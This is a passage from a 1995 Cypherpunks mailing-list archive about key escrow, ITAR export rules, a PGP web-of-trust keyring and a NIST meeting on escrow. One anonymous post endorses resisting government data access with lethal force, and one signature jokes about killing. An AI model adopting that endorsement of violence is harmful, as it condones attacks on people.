codes or ciphers, or cryptanalysis for its own sake. How to Submit a Refereed Paper Submissions must be received by Mar 19, 1996. Authors are encouraged to submit an extended abstract which discusses key ideas and demonstrates the structure of the finished paper. Extended abstracts should be 3-5 pages long (about 1500-2500 words), not counting references and figures. The body of the extended abstract should be in complete paragraphs. The object of an extended abstract is to convince the reviewers that a good paper and presentation will result. Full papers can be submitted if they are complete in advance of the date. Full papers should be 8 to 15 typeset pages. Authors will be notified of acceptance on April 15, 1996. All submissions will be judged on originality, relevance, and correctness. Each accepted submission will be assigned a member of the program committee to act as its shepherd through the preparation of the final paper. The assigned member will act as a conduit for feedback from the committee to the authors. Camera-ready final papers are due June 10, 1996. Please accompany each submission by a cover letter stating the paper title and authors along with the name of the person who will act as the contact to the program committee. Please include a surface mail address, daytime and evening phone number, and, if available, an email address and fax number for the contact person. If you would like to receive detailed guidelines for submission and examples of extended abstracts, you may send email to: securityauthors at usenix.org or telephone the USENIX Association office at +1 510 528 8649. The UNIX Security Symposium, like most conferences and journals, requires that papers not be submitted simultaneously to another conference or publication and that submitted papers not be previously or subsequently published elsewhere. Papers accompanied by "non-disclosure agreement" forms are not acceptable and will be returned to the author(s) unread. All submissions are held in the highest confidentiality prior to publication in the Proceedings, both as a matter of policy and in accord with the U.S. Copyright Act of 1976. Where To Submit Please send one copy of an extended abstract or a full paper to the program committee via each of two, for reliability, of the following methods. All submissions will be acknowledged. o Preferred Method: email (Postscript or ASCII) to: securitypapers at usenix.org o Alternate Method: postal delivery to Security Symposium USENIX 2560 Ninth St., Ste. #215 Berkeley CA 94710 U.S.A. Phone: +1 510 528 8649 o Fax: +1 510 548 5738 Registration Materials Materials containing all details of the technical and tutorial programs, registration fees and forms, and hotel information will be available at the end of April 1996. If you wish to receive the registration materials, please contact USENIX at: USENIX Conference Office 22672 Lambert Street, Suite 613 Lake Forest, CA USA 92630 +1 714 588 8649; Fax: +1 714 588 9706 email: conference at usenix.org Information can also be found under the USENIX Association WWW page URL: http://www.usenix.org From don at cs.byu.edu Thu Sep 7 21:47:47 1995 From: don at cs.byu.edu (don at cs.byu.edu) Date: Thu, 7 Sep 95 21:47:47 PDT Subject: Ring: Server problem Message-ID: <199509072022.OAA00701@wero.byu.edu> -----BEGIN PGP SIGNED MESSAGE----- AAAAAAAAAAAKKKKKKKKK My server has had problems with both incoming ftp and rz. Not only is it very flakey, but they've mis-applied a timeout lately, meaning I have to press a key every 10 minutes during ftp or the process gets killed. Oh, and they did that just before becoming very busy. I delayed announcing my keyring until I could physically transfer the keyring by disk. After getting mail reporting it being corrupted, I had to delete it. It's possible that when I mounted my disk, it could have defaulted into an ascii conversion. I am currently trying to uuencode the entire file and mail it to myself from my local machine. (Heh) If that fails, the keyring will unfortunately not be available until tomorrow, when I can physically transfer it. Sorry for the delay. Don -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQB1AwUBME9UYcLa+QKZS485AQFiAAL/bOEgCAeQVPfIzaU3fbRzowK+Wh+lwgaY TY/O9DssheM34qbQcaM3qx9/7Gv4J+kamvhNOgNPhInsQ9ZATKFFtfbPTKimH/jm dP6g51WxbhdQV6mUdXoPT1z1yFAUPEiL =HaPy -----END PGP SIGNATURE----- From nobody at REPLAY.COM Thu Sep 7 21:50:51 1995 From: nobody at REPLAY.COM (Anonymous) Date: Thu, 7 Sep 95 21:50:51 PDT Subject: GAK In-Reply-To: Message-ID: <199509080450.GAA29735@utopia.hacktic.nl> In article , bdavis at thepoint.net (Brian Davis) wrote: >I, of course, know of the "dislike" of GAK here. I am curious to know, >however, if the "dislike" is because government would have access under >any circumstances or if the primary worry is that government will cheat >and get access when most would agree that they shouldn't (either by the >judge "cheating" or a TLA stealing it). Speaking only for myself, I would resist government access to my data or property. Court orderd warrant or not. I firmly believe that the majority of "lawful" acts the goverment in its various incarnations commits every day is in violation of not only the US Constitution, but of the natural rights given to me as part of my humanity. I therefore hold that I have right, if not the duty, to resists these acts in anyway possible, upto and including the use of lethal force. The number of citizens who share this opininon are growing every day. --anon, due to the denoucement of the Bill of Rights by the criminals in high office. From bdavis at thepoint.net Thu Sep 7 22:00:47 1995 From: bdavis at thepoint.net (Brian Davis) Date: Thu, 7 Sep 95 22:00:47 PDT Subject: ON OFF-TOPIC In-Reply-To: Message-ID: On Thu, 7 Sep 1995, Yih-Chun Hu wrote: > On Thu, 7 Sep 1995 hallam at w3.org wrote: > > Whatever. Clinton proposed crypto, some democrat wrote the electronic ^^^^^^^^^^^^^^^^^^^^^^^ Sorry. Clipper precedes Clinton. > decency act. (In fact Gingrich was against it) EBD From dr261 at cleveland.Freenet.Edu Thu Sep 7 22:46:38 1995 From: dr261 at cleveland.Freenet.Edu (Tobin T Fricke) Date: Thu, 7 Sep 95 22:46:38 PDT Subject: Magazine / Goodbye Message-ID: <199509080546.BAA27342@kanga.INS.CWRU.Edu> Hello, everyone.. I am posting this to let everyone know that I am starting a semitechnical magazine titled _The_Carrier_Wave_. It will be published every two months to begin with, and hopefully monthly if I receive enough material. I am requesting articles, columns, news, bits, etc.. Whenever anything -interesting- happens, I'd appreciate it if someone could write a long or short blurb about it and forward it to me. Events, meetings, tradeshows, milestones, new algorithms... Stories about PGP, Clipper, etc... Use this to get the word out. If someone could run a "Cryptography Column" or "CryptoNews" or a Cypherpunks column, that would be great... If you are interested, please send me mail at dr261 at cleveland.freenet.edu.. Also note, I have unsubscribed to Cypherpunks because I will be very busy lately and an overflowing mailbox is undesirable. Thanks! !!! -- Tobin Fricke (aka LightRay) The Digital Forest BBS (714)586-6142 dr261 at kanga.ins.cwru.edu KE6WHF Amateur Radio, 1:103/925 fido From jlasser at rwd.goucher.edu Thu Sep 7 23:31:04 1995 From: jlasser at rwd.goucher.edu (Jon Lasser) Date: Thu, 7 Sep 95 23:31:04 PDT Subject: ON OFF-TOPIC In-Reply-To: Message-ID: On Thu, 7 Sep 1995, Yih-Chun Hu wrote: > > The problem is currently with the right wing, right wing democrats such as > > Clinton and practically all the Republicans. > > > > Whatever. Clinton proposed crypto, some democrat wrote the electronic > decency act. (In fact Gingrich was against it) Well, Gingrich SAID he was against it. But he hedged even on that, and he certainly didn't DO anything about his opposition to it, unlike his actions with regard to things he truly supports. Jon ------------------------------------------------------------------------------ Jon Lasser (410)494-3072 Visit my home page at http://www.goucher.edu/~jlasser/ You have a friend at the NSA: Big Brother is watching. Finger for PGP key. From wilcoxb at nag.cs.colorado.edu Thu Sep 7 23:35:23 1995 From: wilcoxb at nag.cs.colorado.edu (Bryce Wilcox) Date: Thu, 7 Sep 95 23:35:23 PDT Subject: Announce: Web of Trust Ring In-Reply-To: <199509071832.MAA00480@wero.byu.edu> Message-ID: <199509080635.AAA01087@nag.cs.colorado.edu> -----BEGIN PGP SIGNED MESSAGE----- > WEB OF TRUST KEYRING GENERATION PROJECT > > I have completed my project to make a condensed version of the keyserver > PGP keyrings, containing only the "web of trust" inter-related keys. My > methods were rather crude, and unfortunately only extracted those people > who have signed someone (already on the list) else's key. That means that > people who are well connected on the web of trust are included, while > those people who only receive signatures from well-connected people are > not included. A very interesting project! Can you give us some data like how many is the maximum number of hops necessary to connect two people on the WoT? (I am aware that one wouldn't want to trust such a connection, and that PGP doesn't actually allow you to do so for hops > 2...) (P.S. I guess "12" based on the number of passes necessary. That seems like a really high number to me...) Are any obvious pseudonyms in? (I would guess not.) I wonder what sorts of statistical analyses could be done on this WoT? Is it fairly evenly spread out or are the noticeably larger "clumps" of mutual signatures? How many keys *are* there in this (subset of the) WoT? Here's a question: for two randomly selected members of your WoT, how many signatures would a Man In The Middle have to fake in order to isolate the one member from the other? Thanks for this, Don. Bryce signatures follow: + public key on keyservers /. island Life in a chaos sea or via finger 0x617c6db9 / bryce.wilcox at colorado.edu ---* -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Bryce's Auto-PGP v1.0beta3 iQCVAwUBME/kDPWZSllhfG25AQHGFAQApDoogEs7Dv8+ncQYAR7NUStvL2acs9x3 j5aEeF/GpA6kKZD/Rw6FO5vqCXol/fJ0oGgwgTBPzJAF2ZfUQ6P1KQJweAebDuNs 2JlBjEkTpaDgQ6PwPFwzEr02nP06wE0mF5ssdDvd2LcIbVdDY2XB7jyXh4+AC1fP +lRujkScF0M= =/ef6 -----END PGP SIGNATURE----- From stewarts at ix.netcom.com Fri Sep 8 00:00:48 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 8 Sep 95 00:00:48 PDT Subject: Notes from NIS&T Key Escrow Export conference. Message-ID: <199509080700.AAA23137@ix3.ix.netcom.com> At 11:26 AM 9/7/95 -6, Peter Trei wrote: >"If keys are escrowed, what purpose does a 64 bit limit serve?" A 64 bit limit serves lots of purposes, like letting the NSA crack stuff; I suspect escrow is being used as an excuse to get big vendors to standardize on wimpy 64-bit crypto as much as anything else. >Secondarily, I observe that this apparently precludes the use of OTP. Not to the devious (though the devious may not be able to get export approval) After all, you could escrow a _lot_ of 32-bit OTPs :-) (yeah, I know, the requirement that you identify which escrowed key is being used makes that less than useful, unless the final standard comes out with clear, unambiguous language which fails to cover all cases and can therefore be abused - that's one problem with the current "ask the NSA" rule.) #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From starrd at iia2.org Fri Sep 8 00:10:47 1995 From: starrd at iia2.org (starrd) Date: Fri, 8 Sep 95 00:10:47 PDT Subject: Scientology and police visit XS4ALL Amsterdam In-Reply-To: <9509071507.AA08037@cantina.verity.com> Message-ID: On Thu, 7 Sep 1995, Patrick Horgan wrote: > I know who you're referring to by saying co$, but what do co$ mean? > Co-DollarSign? Co-Dollar? > Church of $cientology [the $ replacing the S because their true goal is profit, not help] ||||||||||||email address: starrd at iia2.org or starrd at cinenet.net||||||||||| | Creator of the original | Get paid to upload | | Patriot's Archives \ shareware to BBSes and | | ftp: iia.org /pub/users/patriot \_____ the Internet! | | ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\ Get file: | | For index of available files: descript.ion \ uploader.zip | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAzAN3FwAAAEEAOgWK9QJo3LIPXC+C/RHE+nmlddXPthC0hgLL7oKg7WPjYgk LrX7j0eUmb5e6t2sm/PkJ1wjk839fqjUmRPLD0mhPX6KsMB0DoecYbCKLrNUY1gP 7DZijj9e7fuPaHqhuY7K5rGjN4po4ZxGhEPQv32IjQLSza9nbU05aMuMG71tAAUR tB9EYXZpZCBXIFN0YXJyIDxzdGFycmRAaWlhMi5vcmc+iQCVAwUQMCnJQEY2REVK Mit9AQG9AAQAps4lKzeQ/OQyXbvxG4b5wWsvHEK/K+1L/tfG0+EmlEsDARaN2pBD cCslIKHjBa8al2BaTSsNjCUSHMgd+IWRp+nw2XJt/lRqpvTN5m7pPNAEQbSgCGwf 9kJ1IDPMokOw9XXAuGAqMQi9HogepNxp7JOdNphcJulHf9XbyCy/sig= =0Tlq -----END PGP PUBLIC KEY BLOCK----- From hal9001 at panix.com Fri Sep 8 00:12:11 1995 From: hal9001 at panix.com (Robert A. Rosenberg) Date: Fri, 8 Sep 95 00:12:11 PDT Subject: Why Key Escrow (GAK) is So Bad Message-ID: At 10:22 9/7/95, Timothy C. May wrote: >(Ironically, I just heard about a case in Texas where a judge ordered a >mother to stop speaking in Spanish to her child at home, calling it "child >abuse." The implications of this are self-evident.) You have the facts slightly wrong. The order was no to stop talking Spanish and to use English but only to Not use Spanish EXCLUSIVELY but to also use English (so as to allow the Child to Grow up in a Bilingual Environment). Waiting until the child was old enough to go to school would put the Child at a disadvantage in learning English since the window of Chance for Language Skill Pickup would have closed. From don at cs.byu.edu Fri Sep 8 00:26:07 1995 From: don at cs.byu.edu (don at cs.byu.edu) Date: Fri, 8 Sep 95 00:26:07 PDT Subject: Announce: Web of Trust Ring Message-ID: <199509072300.RAA00742@wero.byu.edu> -----BEGIN PGP SIGNED MESSAGE----- First: after mailing myself the file in 16k chunks... the ring is up, and intact. The only difference from what the original was supposed to be is that both of my keys are now assigned a trust of unknown instead of undefined. *shrug* From: Bryce Wilcox >A very interesting project! Can you give us some data like how many is the >maximum number of hops necessary to connect two people on the WoT? (I am >aware that one wouldn't want to trust such a connection, and that PGP >doesn't actually allow you to do so for hops > 2...) My original message details the brute-force approach I took, and the imperfections that it intails. If everybody who signed a key recieved a signature back from the same person, the ring I generated really would be "The" WoT. (I don't mean to center on "my ring" versus local WoTs that people have, but I centered around Warlord, Zimmermann, and Jeff S., and seeing as how those happen to be keys that come with PGP, that's where I'd imagine most people would start looking.) Unfortunately, there are a lot of nobodies included just because they signed someone elses key. For the same reason, someone who was signed by a well-known key, but didn't sign back, and didn't sign anybody elses key who was included, didn't make it to the ring. Imperfections aside, the ring is 4.5 meg smaller than the unimi keyring, which makes it Pretty Good[tm]. (ha ha) I forgot to mention it before, but this keyring is most accurately described as a keyring full of some of the people who are more relevant to the Web of Trust than lots of the people who aren't in the keyring. PGP lets you define how many levels of trust you want. Due to the way in which the ring was constructed, I'd guess that the longest chain could not be longer than 6-8 keys. >(P.S. I guess "12" based on the number of passes necessary. That seems >like a really high number to me...) No kidding. I ran the program with high priority most of the time, but I was doing on my home 386... Hence the 4-6 hour runtimes per pass. >Are any obvious pseudonyms in? (I would guess not.) YEEEEEEESSSSSSS, there are. (Hint: check for @whitehouse.gov) >I wonder what sorts of statistical analyses could be done on this WoT? It's still full of _nobodies_ who only got in because they signed a known key of someone they never met and mailed it to a keyserver. Unfortunately, I don't have the technical abilities to check for mutual signatures, or only include keys that are signed by someone already in the WoT. That's _my_ expert statistical analysis... >Is it fairly evenly spread out or are the noticeably larger "clumps" of >mutual signatures? How many keys *are* there in this (subset of the) WoT? There's a couple people that have half a zillion sigs. Many people have signed someone else's key but have noone else's sig on their own. >Here's a question: for two randomly selected members of your WoT, how many >signatures would a Man In The Middle have to fake in order to isolate >the one member from the other? If we talk about the WoT instead of the WoN (web of nobodies) then I would guess faking 2-3 specific (attacker-chosen) people would cut off a good share of the keys, 4-5 for many more, and about 500 (ok, maybe only 15-25) for some of the well connected people. For jargon's sake we can call those the Dial-up, the ISDN and the T3 people respectively. >Thanks for this, Don. :) - -Don the Dialup -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQB1AwUBME95P8La+QKZS485AQHmHQMAs0UXaSan5PWDfppPU1WCNuz7eiXgpxeS Y+2vHc1ZofT+Mq99Y2+aMgZGPasowQ/zdLIf4mNLZR1QNEf7eUf9wCLXY2fH5REw t4uwpvRlz9TkkaUbwSmW+kBXept8H7WE =8kPL -----END PGP SIGNATURE----- From goedel at tezcat.com Fri Sep 8 02:06:18 1995 From: goedel at tezcat.com (Dietrich J. Kappe) Date: Fri, 8 Sep 95 02:06:18 PDT Subject: Why Key Escrow (GAK) is So Bad Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >At 10:22 9/7/95, Timothy C. May wrote: >>(Ironically, I just heard about a case in Texas where a judge ordered a >>mother to stop speaking in Spanish to her child at home, calling it "child >>abuse." The implications of this are self-evident.) > >You have the facts slightly wrong. The order was no to stop talking Spanish >and to use English but only to Not use Spanish EXCLUSIVELY but to also use >English (so as to allow the Child to Grow up in a Bilingual Environment). >Waiting until the child was old enough to go to school would put the Child >at a disadvantage in learning English since the window of Chance for >Language Skill Pickup would have closed. (drifting wildly off topic...) Consider me exhibit A that speaking only German in the home until age 17 does not diminish ones language skills. In fact, (drifting...) it was only until I began speaking English to the exclusion of German that my language skills began to decline. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBgAwUBMFAVMnIf3YegbdiBAQGHEQJWLnmpNDvyxYnj92AB+nQXcR3ys0TorYVQ EoIAJAi+hyARme8291R7Ky6PeCdGNXOlEVpdVchh2MO/rpgI/Zn1OwjaPMpFrFZd 1ph7 =M/sp -----END PGP SIGNATURE----- Dietrich J. Kappe | Red Planet http://www.redweb.com/ Red Planet, L.L.C.| "Chess Space" /chess 1-800-RED 0 WEB | "MS Access Products" /cobre Web Publishing | PGP Public Key /goedel/key.txt From alano at teleport.com Fri Sep 8 02:10:18 1995 From: alano at teleport.com (Alan Olsen) Date: Fri, 8 Sep 95 02:10:18 PDT Subject: Key Escrow Papers via FTP Message-ID: <199509080910.CAA04960@desiree.teleport.com> The papers on Key Escrow scanned by John Young are available for FTP from: ftp://ftp.teleport.com/pub/users/alano/nist.zip They have been seperated into seperate text files (7 in all). I will have an HTML version available from my web page soon. (I am in the process of converting the text to something HTMLlike.) Comments/flames/etc can be sent my way, to John Young (jya at pipeline.com) and/or to /dev/null (davenull at netscape.com). Enjoy! | Visualize whirled keys | alano at teleport.com | |"It's only half a keyserver. I had to split the | Disclaimer: | |other half with the government man." - Black Art | Ignore the man | | -- PGP 2.6.2 key available on request -- | behind the keyboard.| | http://www.teleport.com/~alano | | From frissell at panix.com Fri Sep 8 03:30:45 1995 From: frissell at panix.com (Duncan Frissell) Date: Fri, 8 Sep 95 03:30:45 PDT Subject: Legality of Cash Transactions In-Reply-To: Message-ID: On Thu, 7 Sep 1995, Timothy C. May wrote: > Try buying a car with cash, especially a car costing over $10,000. > > Black Unicorn posted an account a while back (sometime last year) of his > efforts to pay cash for a new car. It occurred to me that the four cars I've bought in my life have been paid for in cash. Of course my taste for 10-year-old cars makes it easier to keep the price under $10,000. Indeed, I think the most I've ever paid was less than $3100. DCF "Too bad for Packwood he didn't hack two people to death with a knife. He might have gotten off." From pfarrell at netcom.com Fri Sep 8 03:33:25 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Fri, 8 Sep 95 03:33:25 PDT Subject: NIST notes available Message-ID: <199509081030.DAA06056@netcom3.netcom.com> Thanks to John Young, I have placed the test of the handouts from Wedensday's and Thursday's meetings on my Nist pages. url: http://www.isse.gmu.edu/~pfarrell/nistmeeting.html It is my belief that this meeting was a staged presentation. Nearly every industry representative said that this was a fatally flawed idea. It was "a non-starter." The government representatives said that they heard the comments, but insisted on proceeding. The most depressing presentation was Thursday morning, made by a high level Dept of Justice flack. I'll have to dig out my notes, his name was Geoff G... He presented the usual drug dealer, pedophile and terrorist line, and added corrupt government officials. He pretended to talk about foriegn bad guys. Nearly all were domestic. He clearly wants weak GAK so that he can decrypt anything domestically that he wants. It is clear to me that the government intends that industry provide crippled encryption "for export" with the never stated expectation that since industry has repeatedly said that they want only one version of products, capable of being sold worldwide, that Domestic products will be crippled. It is equally clear from representatives of IBM, Compaq, DEC, Lotus, and others that I talked to, that crypto product development will simply move offshore. Ireland, Israel, and Germany already have significant experience in developing commercial software. It is depressing to hear our Commerce department chasing technology and jobs overseas. GAK is bad enough. Weak GAK makes me gag. Pat Pat Farrell grad student http://www.isse.gmu.edu/students/pfarrell Infor. Systems and Software Engineering, George Mason University, Fairfax, VA PGP key available via finger or request #include standard.disclaimer From asgaard at sos.sll.se Fri Sep 8 03:43:12 1995 From: asgaard at sos.sll.se (Mats Bergstrom) Date: Fri, 8 Sep 95 03:43:12 PDT Subject: (changed) Criminals and Crypto In-Reply-To: <199509080406.AAA25183@kanga.INS.CWRU.Edu> Message-ID: Tobin T Fricke wrote: > I think that is a good point. Of course, if all non-escrowed > encryption techniques were made illegal, then the criminals would > just have another broken law under their belt if they used > strong encryption. After all, an outlaw is an outlaw because > he has broken laws, so what sense does it make to make more > laws for him to break? Hmph. Exactly. As someone recently pointed out, the practical result would only be to define a new class of single-crime criminals (cypherpunks/cyphercriminals). In my .se perspective this is emphasized by our penalty system. In the foreseeable future (10 years?) they would never get away with a harsher penalty for using un-GAKed crypto than a moderate fine. To 'real' criminals, who usually don't have open assets to forfeit (and the current praxis is then to forget about it after a few years) and no reputation as law-abiders to defend, it would be a joke, of course. Mats From danisch at ira.uka.de Fri Sep 8 05:09:39 1995 From: danisch at ira.uka.de (Hadmut Danisch) Date: Fri, 8 Sep 95 05:09:39 PDT Subject: fast modular reduction (proof?) Message-ID: <9509081207.AA02681@elysion.iaks.ira.uka.de> Oops, sorry for sending it twice. After the first mail I got an error message which said the mail wasn't delivered because it contained control characters. I thought the first mail didn't go out. Hadmut :-( From paul.elliott at hrnowl.lonestar.org Fri Sep 8 05:50:40 1995 From: paul.elliott at hrnowl.lonestar.org (Paul Elliott) Date: Fri, 8 Sep 95 05:50:40 PDT Subject: Cypher Rant II: Why Private Cryptography should not be regulated. Message-ID: <30502bf1.flight@flight.hrnowl.lonestar.org> -----BEGIN PGP SIGNED MESSAGE----- CypherRant V2: Reasons why private cryptography should not be regulated. Paul Elliott is solely responsible for this document. Please distribute widely. FBI director Freeh has been going around pushing his stupid plans for cryptography regulation. Usually, these plans take the form of some kind of mandatory key escrow. Mandatory key escrow schemes are requirements that encryption keys be given to government agencies with the promise that the keys will not be used without a warrant. Now let me give some reasons why Freeh's requests should be ignored. 1) It is unconstitutional! a) First amendment. Electronic communications are a form of speech and the cryptography regulations try to regulate this speech to a form the government understands. Congress shall make NO LAW ....or abridging the freedom of speech or of the press; ... They really meant it! b) Second amendment. Cryptography is arms. Even U.S. government ITAR regulations admit this. Therefore cryptography is protected by Second amendment. c) Ninth & tenth amendments. Article I section 8 does not give congress the power to tell us what computer software we can run on our computers. Therefore that power remains with us, and we should be able to run whatever cryptography software we want the displeasure of congress not withstanding. d) The power to search, if a warrant exists, which is mentioned by the fourth amendment, does not grant the government the right to succeed in finding what the it is looking for. In other words the power to search, is not a power to guarantee a successful search. It is not a power to require citizens to run their lives in such a manner that any government search will be successful. For more information on this, see the following World Wide Web url: http://www.clark.net/pub/cme/html/avss.html Since all Senators and Congressmen take an oath to preserve and defend the constitution of the U.S., this should be the end of the argument. However, watching some of the stupid laws that have come out of congress in past years, tells me I should supplement the above with additional argument. I am not a lawyer and I am not trying to be one. I have no opinion as to whether private cryptography regulations will be found unconstitutional. There are a number of cases where out courts have made decisions which do great violence to the plain meaning of the text of our constitution. Knowing what the courts will actually do is the business of lawyers. Understanding the constitution so that one may know what the courts should do should be the business of every citizen. 2) The excellent NRA argument "when guns are outlawed only outlaws will have guns" applies with equal force to cryptography! Professional criminals will circumvent with ease any government regulations on cryptography. Billions of bytes travel the internet yearly. The techniques of steganography make it absolutely trivial for any motivated person to conceal any encrypted messages. The Big Brother cryptography regulations will affect only ordinary citizens. 3) Cryptography is already in use by legitimate business. Any government regulation of cryptography will probably cost huge amounts of money for software and hardware costs for existing systems to be changed to a form that the government approves. The existing ITAR regulations probably cost the U.S. economy large amounts of money because U.S. companies can not market cryptography software internationally. For information, see: http://www.eff.org/pub/Crypto/ITAR_export/tis_walker_export_101293_hr.testimony By discouraging private cryptography, the ITAR regulations probably enables a large amount of computer crime since it makes it difficult for people to protect themselves. The ITAR regulations have not and can not prevented strong cryptography from making it outside the U.S. How many tons of cocaine illegally enter the U.S. every year? Yet the government ITAR regulations propose to regulate the export of software that can fit in a shirt pocket, or travel by wire concealed with billions of bytes of data that leave the U.S. every year. It is time for the U.S. government to start living in the real world! According to an article in the August 17, 1995 Wall Street Journal, ITAR regulations have required Netscape to use inferior encryption methods in the international version of its World Wide WeB browser software. This inferior encryption method has actually been broken by a French Hacker! Because of its computational intensity, this weakness in the encryption method does not represent an immediate danger. However as more powerful computers continue to develop, this and similar vulnerabilities will present a danger for those who wish to use the internet for commerce. For more information, see: http://pauillac.inria.fr/~doligez/ssl/ 4) These regulations make it impossible for an individual to have greater privacy than the U.S. government. The Adlrich Ames case makes it clear that the U.S. is incompetent to keep a secret. 5) The proposed regulations require the American people trust the government, but on the contrary, the government should be required to trust the American people. Recent news stories (Waco ect.) make it clear that it is common for government agents to lie to get a search warrants. Government should be viewed as George Washington did as "a fearful servant and a dangerous master". A recent poll conducted by the Americans Talk Issue Foundation said 76% of the people questioned responded that they rarely or never trust "government to do what is right". This mistrust is well founded. At the same time as administration sources were saying that key escrow schemes would remain voluntary, FBI, NSA, and DOJ experts were saying that the schemes must be made mandatory if they were to be at all effective. If the government is willing to lie to establish a key escrow key system, what makes us believe that the government will not lie when applying for warrants to use that system? For more information on this, see: http://www.efh.org/pgp/fbilie.html If any key escrow system is adopted, the secret FISA court will undoubtedly be given the power to issue warrants for decryption keys. The FISA court has granted over 7,500 wiretap requests in complete secrecy with only one refusal. The secrecy of this court creates a great opportunity for abuse. If the court is lied to, the lie is not exposed, because the people with an interest in exposing the lie do not know the lie exists. If the court grants legally unwarranted warrants, there is no one to appeal or to try to stop the practice, because no one knows about the problem. For information, see: http://MediaFilter.org/MFF/CAQ/caq53.court.html 6) It is too humiliating to require a free people to participate in the establishment of their own surveillance prisons. This is what key escrow requires. Consider the words of our revolutionary heritage: Those who would sacrifice essential freedoms for temporary safety deserve neither. Benjamin Franklin If ye love wealth greater than liberty, the tranquility of servitude greater than the animating contest for freedom, go home from us in peace. We seek not your counsel, nor your arms. Crouch down and lick the hand that feeds you; and may posterity forget that ye were our countrymen. Samuel Adams Do you think that these men would approve the government's key escrow requests? This information can also be found at the following url: http://www.efh.org/pgp/rant.html - -- Paul Elliott Telephone: 1-713-781-4543 Paul.Elliott at hrnowl.lonestar.org Address: 3987 South Gessner #224 Houston Texas 77063 -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAgUBMFA5K/BUQYbUhJh5AQGOjAP+OyDEtAJGL32S8IK+HGAfaOTkpCI18SCL QvSTaknPd5J2m+yzamGD88Z2YJKwW1M+2GgqGqsclCpI+KCvSp2Z9h1KXWT6ANGR MXTuK3fjVmlvp5lqZAwHb133qL97e60MIq+5lK26FPaGzBCr7ckPMF0cvM+mm4dW dyc1uuXaZg0= =bVzd -----END PGP SIGNATURE----- From mfroomki at umiami.ir.miami.edu Fri Sep 8 06:39:02 1995 From: mfroomki at umiami.ir.miami.edu (Michael Froomkin) Date: Fri, 8 Sep 95 06:39:02 PDT Subject: Cypher Rant II: Why Private Cryptography should not be regulated. In-Reply-To: <30502bf1.flight@flight.hrnowl.lonestar.org> Message-ID: forgive me for the advertisement, but I *am* a lawyer, and I think this well-intentioned rant gets some stuff wrong. If you want to know why I think this, visit my homepage and follow the link to my Clipper paper. Please note the homepage is a bit mobile right now; this address is temporary, but the next one should be stable. A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | mfroomki at umiami.ir.miami.edu U. Miami School of Law | P.O. Box 248087 | It's hot here. And humid. Coral Gables, FL 33124 USA | See (soon to move to its real home): http://www.law.miami.edu/~mfroomki From pfarrell at netcom.com Fri Sep 8 06:39:12 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Fri, 8 Sep 95 06:39:12 PDT Subject: Day 2, nist GAK meeting Message-ID: <199509081336.GAA16190@netcom3.netcom.com> -----BEGIN PGP SIGNED MESSAGE----- Date: Fri, 8 Sep 1995 09:32:43 -0400 (EDT) From: "Pat Farrell" To: cypherpunks at toad.com Cc: BCc: Subject: Day 2 NIST meeting notes X-NUPop-Charset: IBM 8-Bit Thursday's GAK Export meeting started with reports from the prior afternoon's breakout meetings. I reported on the session I was in, saying what I posted to the list yesterday (about National Semi's product, etc.) The other breakout groups reported their problems with the criteria, again asking that #9 be dropped, longer, keys, etc. The presentation for Group "A" was different. It was a speach. It asked that the process be stopped to let industry develop market-driven solutions. It was greeted by applause from the vendors and privacy advocates, with no reaction from the government representatives. Randy Williams of Commerce, and Dan Cook of State, described the current export approval process. Lots of talk of jurisdictions and types of liscenses. I quickly got lost in the jargon. The moderator wisecracked that the official language of the session was English. You couldn't tell from some of the exchanges. They were questioned on import restrictions. Both Williams and Cook said that there are no import restrictions into the US. They also pointed out that Treasury, not State or Commerce, has jurisdiction over imports. An engineer from Compaq asked a question: He said that his company buys liscenses to software, and bundles it as "value added" to their systems. They are interested in bundling in security features. He asked if his computers would then be subject to export restrictions. The answer was yes. He asked if he could purchase security software overseas and import it. The answer was again yes. He asked if he could install that software on his computers, again yes. And export the computers, NO. They didn't even seem to think that this was illogical. So Commerce, State, and the rest of the government are activly encouraging the development of competing software industries in Israel, Germany and other counrties. I hate to think what they'd do if they tried to hurt US industry. And interesting tidbit came up after the session. In an offline conversation, the topic of "personal use export" came up. A reliable source said that revised regulations are being developed, and will, be avaialble soon. I explicitly asked if this meant "PGP on a notebook computer" and was told, Yes, that will be allowed; with the usual rules that it can't be for export, you can't be attempting to sell it, etc. Personal use, carry out and carry back. The "source" was asked if they had read Matt Blaze's personal use disaster story. The name didn't ring a bell, but the story was well know and considered a nightmare. Penny Brummitt of NSA was to talk about Clipper's key escrow agents, but called in sick. I didn't catch the name of the replacement. He talked about Clipper's process, not as an example of what will be required for GAK agents, but as an "existance proof" that some agents can be found. The essence was that Clipper escrow facilities are strong, and staffed with people cleared to the "Secret" level. They also tosed out the phrase "US Person" in regard to the corporate entity that is responsible for the contract. Geoff Greiveldinger, of the US Department of Justice, gave a frequently inaudible recounting of the evils of strong encryption in the war on D, P, & T, and also corrupt mayors. He was very personable. He also sounded like a fascist. Throughout the meeting, all sides tried to have a civil discussion, even though we disagreed. It was impossible to stay civil through his drivel. Ruby Ridge and Furman had been unmentionable up until his speach. Mr. Greiveldinger said that acceptable escrow agents will be in the US. This caused considerable concern among vendors trying to sell in the International market. Dan Weitzer of CDT (the EFF spinoff) gave a short, rousing speach. It was a call to arms. He said that since NIS&T was ignoring the consistant input from industry to stop this silly and stupid GAK, that we need to immediately contact our congresscritters. Ken Mendelsen [sic?] of TIS gave a great speach. He suggested that the critera for escrow agents be the same as the form to export tanks and other munitions. Then he showed the one page form used by State. He argued that legislative solutions to the escrow agent approval process will take too long and kill the effort. I'll try to get copies of his presentation. F.W. Gerbracht, Jr a VP Merril Lynch, represented the Securities Industry Association. He said that they are willing to work with the government, but they need long keys, strong ciphers, and 